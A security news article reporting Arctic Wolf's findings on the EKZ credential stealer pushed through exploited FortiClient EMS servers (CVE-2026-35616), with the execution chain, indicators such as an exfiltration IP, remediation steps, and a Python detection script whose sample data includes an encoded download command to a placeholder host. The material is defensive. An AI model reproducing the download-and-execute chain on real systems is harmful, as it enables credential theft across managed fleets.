FortiClient EMS CVE-2026-35616 Is Now Pushing the EKZ Credential Stealer, Arctic Wolf Says

Arctic Wolf says threat actors are exploiting the patched FortiClient EMS flaw CVE-2026-35616 to deploy EKZ, a previously unreported credential stealer disguised as a Fortinet endpoint update and pushed across managed endpoints through the EMS management pathway itself.


Key Takeaways

  • Arctic Wolf has named EKZ, a previously unreported Windows credential stealer disguised as a Fortinet endpoint update, as the payload of an active-exploitation campaign against unpatched FortiClient EMS servers; it is pushed across managed endpoints through the EMS management pathway itself.
  • CVE-2026-35616 — the FortiClient EMS pre-authentication API access bypass that Fortinet patched in April 2026 — is still being exploited against organizations that have not upgraded to FortiClient EMS 7.4.7 or later, seven weeks after the fix shipped.
  • Any FortiClient EMS server compromised through CVE-2026-35616 should be treated as a fleet-wide incident, because the EMS push channel reaches every endpoint it manages; audit recent endpoint-software pushes, hunt for FortiEndpoint_Patch.exe and Base64-encoded PowerShell, and rotate credentials on endpoints that received pushes during the exposure window.

An endpoint-management console that has not been patched is no longer a missed-update problem. It is a malware-distribution platform waiting for an operator, and the EKZ campaign is the live demonstration.

EDEN PRAIRIE, MINNESOTA — Arctic Wolf said on May 28, 2026 that threat actors are actively exploiting CVE-2026-35616, a FortiClient Enterprise Management Server (EMS) pre-authentication API access bypass that Fortinet patched in April 2026, to deploy a previously unreported Windows credential stealer that Arctic Wolf is calling EKZ. The campaign abuses unpatched EMS servers as a software-distribution channel, pushing a malicious binary disguised as a Fortinet endpoint update down to every endpoint the compromised server manages. BleepingComputer and The Hacker News covered the Arctic Wolf research the same day.

Fortinet fixed CVE-2026-35616 in FortiClient EMS 7.4.7 and later. The flaw carries a CVSS v3.1 score of 9.1, and active exploitation has continued against organizations that have not yet upgraded.

Disclosure Overview
Field: Details
Vulnerability: CVE-2026-35616 — FortiClient EMS pre-authentication API access bypass leading to privilege escalation
CVSS v3.1 Score: 9.1 (Critical)
Patched: April 2026, in FortiClient EMS 7.4.7 and later
Researcher: Arctic Wolf — published May 28, 2026
Campaign Name: EKZ — Arctic Wolf's naming for the credential stealer deployed in this campaign
Payload: FortiEndpoint_Patch.exe — a previously unreported Windows information stealer disguised as a legitimate Fortinet endpoint binary
Distribution Mechanism: Compromised FortiClient EMS instances push the malicious binary to managed endpoints through the EMS management pathway
Cross-Source Reporting: BleepingComputer and The Hacker News — both May 28, 2026

What Happened

Arctic Wolf disclosed on May 28, 2026 that threat actors are actively exploiting CVE-2026-35616 to deploy a credential stealer the firm is calling EKZ. The flaw is a pre-authentication API access bypass in the FortiClient Enterprise Management Server that allows privilege escalation, and Fortinet patched it in FortiClient EMS 7.4.7 and later in April 2026. The campaign Arctic Wolf documented targets EMS instances that have not yet been upgraded — unpatched servers that remain reachable seven weeks after the fix shipped. According to Arctic Wolf, once an EMS server is compromised through CVE-2026-35616, the operator uses the platform's own management functionality to push a malicious binary to every endpoint the server manages.

The malicious binary is delivered as FortiEndpoint_Patch.exe, a previously unreported Windows information stealer disguised as a legitimate Fortinet endpoint update. Arctic Wolf described the execution chain in detail: a legitimate FortiClient executable, fortitray.exe, launches a .cmd script that invokes a Base64-encoded PowerShell command, which downloads and runs the stealer and exfiltrates the captured data over HTTP POST to 83.138.53[.]110 (defanged). The stealer harvests passwords, cookies, autofill entries, credit card information, addresses, and phone numbers from Chromium- and Gecko-based browsers, writes the data to a log file in the ProgramData directory, and relies on the PowerShell stage — not the binary itself — for network exfiltration. Arctic Wolf also observed the operators modifying EMS configuration to defer firmware-upgrade reminders and editing a Remote Access Profile and endpoint policy to insert the malicious script for endpoint execution.

Why an EMS Compromise Is a Fleet-Wide Compromise

The FortiClient EMS is a centralized endpoint-management console. Every FortiClient endpoint connected to it trusts what it sends, accepts configuration changes, and runs the software it pushes — that is the entire purpose of an EMS deployment. CVE-2026-35616, the same flaw The CyberSignal covered when Fortinet shipped emergency patches for it in April, turns that trust into a delivery mechanism. Arctic Wolf summarized the dynamic plainly: "The campaign abused trusted endpoint management infrastructure to deliver malware across managed endpoints." Once an attacker can modify EMS configuration through the API bypass, in Arctic Wolf's own framing, "every managed endpoint became a potential execution target without requiring a separate intrusion path to each device." The blast radius of a CVE-2026-35616 exploit is not the management server. It is every endpoint that server manages, and the trust relationship in between converts a single server compromise into a fleet-wide event.

The Post-Patch Active-Exploitation Update

The CyberSignal covered the original disclosure of CVE-2026-35616 as an actively exploited zero-day in April 2026, when Fortinet shipped emergency patches. The Arctic Wolf research is the update on what has happened in the seven weeks since that patch became available. The vulnerability is the same flaw, the patched version is FortiClient EMS 7.4.7, and the unpatched footprint is still being weaponized — only now the post-exploitation payload has a name (EKZ) and a documented behavior chain. The pattern is familiar across 2026's exploited-CVE landscape: the patch ships, federal deadlines pass, and yet operators continue to find unpatched instances and convert them into useful infrastructure. The newly significant detail in this campaign is not novelty in the flaw, but the demonstration of what an unpatched EMS server actually is in the attacker's economy: a ready-made software-distribution channel.

Endpoint-Management Consoles as a Tier-0 Attack Surface

FortiClient EMS belongs to a category of products — alongside platforms like Tanium, Microsoft Intune, and other endpoint-management or RMM tools — whose architectural job is to push software and configuration changes at scale. That centralization is the value proposition, and it is also a concentration of risk that has become a defining attack surface of 2026. The Verizon DBIR 2026 found that vulnerability exploitation just overtook credential theft as the number-one initial-access method, and the EKZ campaign is a precise instance of that pattern: an exploited CVE in a centrally managed platform yields a path to every device on the other side of it. Endpoint-management consoles should now be treated as Tier 0 alongside domain controllers and identity providers — patched on the same urgency cycle, segmented from the public internet wherever feasible, and protected with the same level of monitoring and access controls — because when they fail, they fail toward the whole fleet.

EKZ Campaign — Execution Chain
Field: Details
Entry Vector: Exploitation of CVE-2026-35616 against unpatched FortiClient EMS servers
Configuration Tampering: Defer firmware-upgrade reminders; modify a Remote Access Profile and endpoint policy to insert a malicious script
On-Endpoint Launcher: fortitray.exe (legitimate FortiClient executable) launches a .cmd script via cmd.exe
PowerShell Stage: The .cmd script invokes a Base64-encoded PowerShell command that downloads, runs, and exfiltrates results
Payload: FortiEndpoint_Patch.exe — previously unreported Windows credential stealer disguised as a Fortinet endpoint update
Data Harvested: Passwords, cookies, autofill entries, credit card data, addresses, and phone numbers from Chromium- and Gecko-based browsers
Local Storage: Captured data written to a log file in the ProgramData directory
Exfiltration: PowerShell stage transmits the captured data over HTTP POST to 83.138.53[.]110 (defanged)

Scope and Impact

The scope of the EKZ campaign is bounded by one variable: the population of FortiClient EMS instances that have not been upgraded to 7.4.7 or later. Arctic Wolf has not published a victim count, and Fortinet has not stated how many unpatched instances remain exposed. What is clear is that any organization still running a vulnerable EMS is a candidate target, and any organization whose EMS may have been compromised since the April patch must treat every endpoint that received a software push during the exposure window as potentially carrying an EKZ-linked binary. Session cookies and saved browser credentials harvested from those endpoints, Arctic Wolf noted, may provide threat actors with follow-on access to cloud services, internal applications, and other authenticated resources — and session reuse can in some cases circumvent MFA prompts.

Several specifics remain unconfirmed. Arctic Wolf has not attributed the campaign to a named threat actor, has not disclosed how many EMS servers have been observed compromised, and has not detailed how operators are locating vulnerable instances at scale. Indicators of compromise — beyond the FortiEndpoint_Patch.exe filename, the fortitray.exe → cmd.exe → PowerShell launch chain, and the 83.138.53[.]110 exfiltration endpoint — have not been comprehensively published, and defenders should monitor the Arctic Wolf research blog for further IOC releases. The campaign also lands in the same broader pattern as other unpatched edge-software exploitation The CyberSignal has tracked, including the Gogs argument-injection RCE that remains unpatched and rated CVSS v4 9.4 — unpatched, high-impact code in widely deployed infrastructure remains the most reliable initial-access surface in 2026.

On the federal-deadline picture: CVE-2026-35616 was added to the CISA Known Exploited Vulnerabilities catalog at the time of the original April exploitation. The Arctic Wolf research does not constitute a new KEV listing; the vulnerability has been on KEV for weeks. What the EKZ campaign does change is the operational posture: organizations that were planning a routine patch cadence around CVE-2026-35616 should now treat any unpatched FortiClient EMS instance as an in-progress incident waiting to be discovered, not a backlog item.

Response and Attribution

For any organization running FortiClient EMS, the action is immediate. Verify that every EMS instance is upgraded to FortiClient EMS 7.4.7 or later — and treat any instance that was internet-reachable and unpatched at any point since the April fix as compromised until proven otherwise. Audit all endpoint-software pushes performed by EMS in the last 60 days for unexpected binaries claiming Fortinet metadata, with particular attention to anything resembling FortiEndpoint_Patch.exe; pull suspicious binaries for analysis. Force-rotate every credential that may have been resident on any endpoint that received an EMS-distributed push during the active-exploitation window, including saved browser passwords, cookies, and tokens that could enable MFA bypass through session reuse. Watch the Arctic Wolf research feed for further EKZ IOC releases and sweep historical telemetry across the fleet as new indicators land.

For SOC and threat-hunting teams, the practical hunts are well-defined. Look for binaries that carry Fortinet metadata but lack valid Fortinet code-signing chains. Hunt for the documented launch chain: fortitray.exe spawning cmd.exe to run a .cmd script that invokes a Base64-encoded PowerShell command. Look for outbound HTTP POST traffic from endpoints to 83.138.53[.]110 (defanged), and pivot on outbound credential-exfiltration patterns from any endpoint that received a push through a potentially compromised EMS. Treat any endpoint-management-server compromise — FortiClient EMS, Tanium, Intune, or equivalent — as a fleet-tier incident from the first minute, not an instance-tier event.
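The hunts above, as an added example that is not from the Arctic Wolf report or The CyberSignal: detection logic run over constructed Sysmon-style process and network events, flagging the fortitray.exe → cmd.exe → encoded-PowerShell launch chain and connections to the reported exfiltration address. It assumes the Base64 stage is passed via PowerShell's -EncodedCommand switch (the report says only "Base64-encoded"); the event field names, file paths and download host are constructed placeholders.

```python
import base64
import re
# IOC from the Arctic Wolf report (the article prints it defanged as 83.138.53[.]110).
EXFIL_IP = "83.138.53.110"
# Assumption: the Base64 stage is passed via PowerShell's -EncodedCommand (or -enc/-e).
ENC_RE = re.compile(r"(?i)(?:-encodedcommand|-enc|-e)\s+([A-Za-z0-9+/=]{40,})")

def decode_encoded_command(cmdline):
    """Return the UTF-16LE plaintext behind -EncodedCommand, or None if absent/invalid."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def hunt(events):
    """Flag events matching the documented EKZ launch chain and exfil destination."""
    hits = []
    for e in events:
        parent, image = e.get("parent_image", "").lower(), e.get("image", "").lower()
        cmd, pid = e.get("command_line", ""), e.get("pid")
        if e.get("type") == "process":
            # Stage 1: legitimate fortitray.exe spawning cmd.exe to run a .cmd script
            if parent.endswith("fortitray.exe") and image.endswith("cmd.exe") and ".cmd" in cmd.lower():
                hits.append(f"launcher-chain pid={pid}: fortitray.exe -> cmd.exe running a .cmd script")
            # Stage 2: PowerShell with a Base64-encoded command; surface the decoded text for triage
            if image.endswith("powershell.exe"):
                plain = decode_encoded_command(cmd)
                if plain is not None:
                    hits.append(f"encoded-powershell pid={pid}: {plain.strip()[:80]}")
        elif e.get("type") == "network" and e.get("dest_ip") == EXFIL_IP:
            # Stage 3: outbound connection to the reported exfiltration endpoint
            hits.append(f"exfil-dest pid={pid}: {image} -> {EXFIL_IP}:{e.get('dest_port')}")
    return hits

# Constructed sample telemetry (Sysmon-style fields), not real events; download host is a placeholder.
STAGE2 = base64.b64encode(
    "Invoke-WebRequest http://DOWNLOAD-HOST-PLACEHOLDER/FortiEndpoint_Patch.exe".encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {"type": "process", "pid": 4120, "parent_image": r"C:\Program Files\Fortinet\FortiClient\fortitray.exe",
     "image": r"C:\Windows\System32\cmd.exe", "command_line": r"cmd.exe /c C:\ProgramData\update.cmd"},
    {"type": "process", "pid": 4188, "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": f"powershell.exe -nop -w hidden -EncodedCommand {STAGE2}"},
    {"type": "process", "pid": 5000, "parent_image": r"C:\Windows\explorer.exe",  # benign control
     "image": r"C:\Windows\System32\cmd.exe", "command_line": "cmd.exe /c dir"},
    {"type": "network", "pid": 4188, "image": "powershell.exe", "dest_ip": EXFIL_IP, "dest_port": 80},
]
```

Running `hunt(SAMPLE_EVENTS)` yields three hits (launcher chain, decoded PowerShell stage, exfil destination) and ignores the benign cmd.exe control event.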

For CISOs, EKZ is the latest confirmation that endpoint-management consoles are now a primary attack-surface category, not an infrastructure afterthought — exactly the pattern the Verizon DBIR 2026 documented when vulnerability exploitation overtook credential theft as the number-one initial-access method. The CISA KEV deadline cycle compresses faster than centralized-management patch SLOs typically allow, which is the structural problem this campaign exposes: a patch shipped in April is still finding unpatched targets in late May. The remediation discipline has to match the architecture. Endpoint-management infrastructure should be patched on the same urgency cycle as domain controllers, monitored with the same intensity, and segmented and access-controlled the same way. Arctic Wolf has not attributed the EKZ campaign to a named threat actor.


The CyberSignal Analysis

Signal 01 — Unpatched EMS Is a Malware-Distribution Channel

The single sharpest editorial point from Arctic Wolf's research is structural: an unpatched FortiClient EMS server is not a missed-update problem. It is a software-distribution channel that an attacker can rent for free by exploiting CVE-2026-35616. The platform's entire value proposition — push software and configuration to managed endpoints, at scale, with trust — is what the operator uses. That reframing matters because it changes how the unpatched footprint should be triaged. An EMS instance running 7.4.6 in the corner of a network is not 'one server behind on patches.' It is an unattended delivery system for whatever malware the next operator wants to ship to every endpoint downstream of it. EKZ is the demonstration. It will not be the last payload to ride this same channel.

Signal 02 — Treat Endpoint-Management Compromise as a Fleet Incident by Default

Most security operations centers default to instance-tier incident response: the box, the host, the affected user. That posture is exactly wrong for an endpoint-management compromise, and CVE-2026-35616 is the textbook example of why. The architectural job of an EMS is to fan changes out to every endpoint it manages. Compromise the server and you compromise the fan-out. The defensive implication is that the first incident-response playbook to run when an EMS is suspected compromised is the fleet-tier one — assume every managed endpoint received a malicious push during the exposure window, plan for fleet-wide credential rotation and integrity verification, and only narrow the scope once telemetry justifies it. Starting narrow and widening costs days the campaign does not need to give defenders.

Signal 03 — Patching the CVE Does Not Close the Incident

Fortinet shipped the fix for CVE-2026-35616 in April. Arctic Wolf is publishing in late May about active exploitation that has continued through the seven-week gap. The lesson generalizes well beyond one vendor: for any critical CVE in centrally managed infrastructure, the patch closes the window for new exploitation but does nothing for instances that were already compromised. The post-patch hunt — sweeping for the actual on-endpoint behaviors, the binaries that were pushed, the credentials that were harvested — is its own work, separate from and additional to the patch itself. EKZ is the reminder that 'we patched' is a sentence about future risk, not present state. The present-state question is what got pushed before the upgrade, and that question only gets answered through telemetry, hunting, and credential rotation.


Sources

Type: Source
Primary: Arctic Wolf — FortiClient EMS Exploited via CVE-2026-35616 to Deliver EKZ Infostealer Disguised as a Fortinet Patch
Reporting: The Hacker News — Threat Actors Exploit Critical FortiClient EMS Flaw to Deploy Credential Stealer
Reporting: BleepingComputer — Hackers Exploit FortiClient EMS Flaw to Push Infostealer Malware
Official: Fortinet PSIRT — FortiClient EMS Advisory (CVE-2026-35616)
Official: CISA — Known Exploited Vulnerabilities Catalog